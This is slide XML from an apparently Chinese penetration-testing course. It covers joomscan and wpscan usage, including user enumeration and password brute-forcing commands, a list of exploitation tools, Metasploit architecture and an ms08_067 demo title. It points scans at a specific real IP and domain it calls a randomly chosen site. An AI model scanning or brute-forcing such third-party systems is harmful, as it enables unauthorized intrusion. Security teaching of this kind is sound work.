        <p:spPr>
          <a:xfrm>
            <a:off x="2244818" y="4236375"/>
            <a:ext cx="8515164" cy="5397919"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="167" name="image6.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1345126" y="1201075"/>
            <a:ext cx="10009748" cy="6788909"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1" p14:dur="1000"/>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0" name="Shape 440"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="829309" y="203199"/>
            <a:ext cx="801878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vl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>先随便找个基于Joomla的网站，例如http://37.60.253.96/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="441" name="Shape 441"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3715172" y="1384475"/>
            <a:ext cx="4896024"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500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>joomscan -u http://37.60.253.96/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="442" name="image59.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1041219" y="2866905"/>
            <a:ext cx="11310568" cy="6367046"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="443" name="Shape 443"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="888999" y="2087590"/>
            <a:ext cx="3818574"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扫描结果，一堆漏洞及exp</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1" p14:dur="1000"/>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5" name="Shape 445"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4972050" y="459911"/>
            <a:ext cx="1837879"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369506">
              <a:spcBef>
                <a:spcPts val="2500"/>
              </a:spcBef>
              <a:defRPr b="1" sz="3700">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>wpscan</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="446" name="Shape 446"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="647698" y="1473199"/>
            <a:ext cx="11406727" cy="101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500"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>WPScan是一款针对wwordpress的安全扫描软件；WPScan可以扫描出wordpress的版本，主题，插件，后台用户以及爆破后台用户密码等。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="447" name="Shape 447"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="647698" y="2842087"/>
            <a:ext cx="138430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vl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>简单命令</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="448" name="Shape 448"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="765463" y="3859905"/>
            <a:ext cx="6553752"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2500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>wpscan —url URI —enumerate p #扫描插件</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="449" name="Shape 449"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="765463" y="5029314"/>
            <a:ext cx="7188752"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2500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>wpscan —url URI —enumerate u #扫描后台用户</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="450" name="Shape 450"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="772690" y="6745551"/>
            <a:ext cx="8317986"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2500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>wpscan —url URI—wordlist DIC.lst —username USER </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="451" name="Shape 451"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="755650" y="6198723"/>
            <a:ext cx="3289300"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500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>＃通过用户名爆破密码</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1" p14:dur="1000"/>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3" name="Shape 453"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="831848" y="279399"/>
            <a:ext cx="8642308"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2500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>例如执行 wpscan —url www.sysorem.xyz —enumerate u </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="454" name="image60.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1006818" y="1381430"/>
            <a:ext cx="11185183" cy="6990740"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1" p14:dur="1000"/>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6" name="Shape 456"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4933205" y="761999"/>
            <a:ext cx="2247901" cy="85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369506">
              <a:spcBef>
                <a:spcPts val="2500"/>
              </a:spcBef>
              <a:defRPr sz="4200">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>漏洞利用</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="457" name="Shape 457"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="subTitle" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2046633" y="4648198"/>
            <a:ext cx="3825878" cy="4797874"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="281876" indent="-281876" algn="l" defTabSz="369506">
              <a:spcBef>
                <a:spcPts val="2500"/>
              </a:spcBef>
              <a:buSzPct val="75000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2100">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Metasploit Framework</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="281876" indent="-281876" algn="l" defTabSz="369506">
              <a:spcBef>
                <a:spcPts val="2500"/>
              </a:spcBef>
              <a:buSzPct val="75000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2100">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>rdesktop  + hydra</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="281876" indent="-281876" algn="l" defTabSz="369506">
              <a:spcBef>
                <a:spcPts val="2500"/>
              </a:spcBef>
              <a:buSzPct val="75000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2100">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Sqlmap</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="281876" indent="-281876" algn="l" defTabSz="369506">
              <a:spcBef>
                <a:spcPts val="2500"/>
              </a:spcBef>
              <a:buSzPct val="75000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2100">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Arpspoof</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="281876" indent="-281876" algn="l" defTabSz="369506">
              <a:spcBef>
                <a:spcPts val="2500"/>
              </a:spcBef>
              <a:buSzPct val="75000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2100">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>tcpdump + ferret + hamster</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="281876" indent="-281876" algn="l" defTabSz="369506">
              <a:spcBef>
                <a:spcPts val="2500"/>
              </a:spcBef>
              <a:buSzPct val="75000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2100">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>Ettercap</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="458" name="Shape 458"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1497012" y="1645574"/>
            <a:ext cx="10436822" cy="8026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l" defTabSz="914400">
              <a:defRPr sz="2000">
                <a:latin typeface="黑体"/>
                <a:ea typeface="黑体"/>
                <a:cs typeface="黑体"/>
                <a:sym typeface="黑体"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>漏洞利用阶段利用已获得的信息和各种攻击手段实施渗透。网络应用程序漏洞诊断项目的加密通信漏洞诊断是必须执行的。</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>顾名思义，利用漏洞，达到攻击的目的。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="459" name="Shape 459"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4971304" y="3685711"/>
            <a:ext cx="19431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内容概要</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="460" name="Shape 460"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6847233" y="4648200"/>
            <a:ext cx="3825878" cy="3175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L="281876" indent="-281876" algn="l" defTabSz="369506">
              <a:spcBef>
                <a:spcPts val="2500"/>
              </a:spcBef>
              <a:buSzPct val="75000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2100">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SET</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1" p14:dur="1000"/>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2" name="Shape 462"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4489450" y="504361"/>
            <a:ext cx="4271027" cy="571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369506">
              <a:spcBef>
                <a:spcPts val="2500"/>
              </a:spcBef>
              <a:defRPr b="1" sz="3100">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Metasploit Framework</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="463" name="Shape 463"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="516225" y="1866899"/>
            <a:ext cx="12217476" cy="2844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500"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>  Metasploit是一款开源的安全漏洞检测工具，Metasploit Framework (MSF) 在2003年以开放源码方式发布，是可以自由获取的开发框架。它是一个强大的开源平台，供开发，测试和使用恶意代码，这个环境为渗透测试、shellcode 编写和漏洞研究提供了一个可靠平台。这种可以扩展的模型将负载控制(payload)、编码器(encode)、无操作生成器(nops)和漏洞整合在一起，使 Metasploit Framework 成为一种研究高危漏洞的途径。它集成了各平台上常见的溢出漏洞和流行的 shellcode ，并且不断更新。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="464" name="Shape 464"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="7213600"/>
            <a:ext cx="1943100"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实例演示</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="465" name="Shape 465"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="535480" y="8102600"/>
            <a:ext cx="11605763"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2500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>入侵Windows XP SP3 (ms08_067)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="466" name="Shape 466"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="547140" y="5232399"/>
            <a:ext cx="10287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概要</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="467" name="Shape 467"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="574620" y="6127749"/>
            <a:ext cx="11605764"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2500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>MSF架构、组件</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1" p14:dur="1000"/>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9" name="Shape 469"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5075104" y="510711"/>
            <a:ext cx="1419492"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2500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>MSF架构</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="470" name="Shape 470"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1011029" y="1282700"/>
            <a:ext cx="10982743" cy="1473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500"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Metasploit Framework并不止具有exploit(溢出)收集功能，它使你专注于创建自己的溢出模块或者二次开发。很少的一部分用汇编和C语言实现，其余均由ruby实现。总体架构：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="471" name="image61.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2597150" y="3067050"/>
            <a:ext cx="7035800" cy="5270500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1" p14:dur="1000"/>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73" name="image61.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2813050" y="247650"/>
            <a:ext cx="7035800" cy="5270500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="474" name="Shape 474"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="448467" y="5715000"/>
            <a:ext cx="12903836" cy="330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500"/>
            </a:pPr>
            <a:r>
              <a:t>TOOLS          集成了各种实用工具，多数为收集的其它软件</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
            <a:r>
              <a:t>PLUGINS      各种插件，多数为收集的其它软件。直接调用其API，但只能在console工作。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
            <a:r>
              <a:t>MODULES    目前的Metasploit Framework 的各个模块</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
            <a:r>
              <a:t>MSF core      表示Metasploit Framework core 提供基本的API，并且定义了MSF的框架。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="8" indent="1828800" algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
            <a:r>
              <a:t> 并将各个子系统集成在一起。组织比较散乱，不建议更改。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
            <a:r>
              <a:t>MSF Base     提供了一些扩展的、易用的API以供调用，允许更改</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
            <a:r>
              <a:t>Rex LIBRARIES        Metasploit Framework中所包含的各种库，是类、方法和模块的集合</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1" p14:dur="1000"/>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76" name="image61.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2813050" y="247650"/>
            <a:ext cx="7035800" cy="5270500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="477" name="Shape 477"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1629250" y="5511800"/>
            <a:ext cx="9746299" cy="421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500"/>
            </a:pPr>
            <a:r>
              <a:t>CLI            表示命令行界面</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
            <a:r>
              <a:t>GUI            图形用户界面</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
            <a:r>
              <a:t>Console        控制台用户界面</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
            <a:r>
              <a:t>Web            网页界面，目前已不再支持</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
            <a:r>
              <a:t>Exploits        定义实现了一些溢出模块，不含payload的话是一个Aux</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
            <a:r>
              <a:t>Payload        由一些可动态运行在远程主机上的代码组成</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
            <a:r>
              <a:t>Nops        用以产生缓冲区填充的非操作性指令</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
            <a:r>
              <a:t>Aux            一些辅助模块，用以实现辅助攻击，如端口扫描工具</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
            <a:r>
              <a:t>Encoders        重新进行编码，用以实现反检测功能等</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1" p14:dur="1000"/>
</p:sld>
</file>

<file path=ppt/slides/slide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9" name="Shape 479"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="588674" y="1257299"/>
            <a:ext cx="318388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2500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>#首先启动postgresql</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="480" name="Shape 480"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="626426" y="2844800"/>
            <a:ext cx="1784669"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su postgres</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="481" name="Shape 481"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="606423" y="3314699"/>
            <a:ext cx="477138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2500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
